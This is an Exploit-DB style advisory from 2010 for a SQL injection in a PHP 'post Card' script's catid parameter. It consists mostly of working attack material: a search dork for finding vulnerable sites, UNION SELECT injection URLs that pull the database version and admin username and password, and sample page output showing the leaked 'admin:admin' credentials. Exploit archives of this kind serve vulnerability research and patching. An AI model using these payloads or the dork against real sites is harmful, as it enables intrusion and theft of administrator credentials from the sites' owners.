post Card - 'catid' SQL Injection

EDB-ID:

11892

CVE:



Author:

Hussin X

Type:

webapps


Platform:

PHP

Date:

2010-03-26


post Card ( catid ) Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home : www.iqs3cur1ty.com<http://www.iqs3cur1ty.com> & www.iq-ty.com<http://www.iq-ty.com>

MaiL : darkangeL_G85@Yahoo.CoM
___________________________________

script : http://webbdomain.com/php/postcarden/index2.php
script : http://webbdomain.com/php/postcardir/index2.php
version : all
DorK : inurl:choosecard.php?catid=
_____

ExploiT & Demo
_______


version :

http://webbdomain.com/php/postcardir/choosecard.php?catid=-1+uniOn+select+version%28%29,555555555555,6666666666666666666+from+admin--

user & pass :

http://webbdomain.com/php/postcardir/choosecard.php?catid=-1+uniOn+select+concat%28username,0x3a,password%29,555555555555,6666666666666666666+from+admin--



Note : Exploit in Source page

Example :

<td><a style="text-decoration:none" href='chosencard.php?id=5.0.89-community // << version :D

<td><a style="text-decoration:none" href='chosencard.php?id=admin:admin' // << here user and pass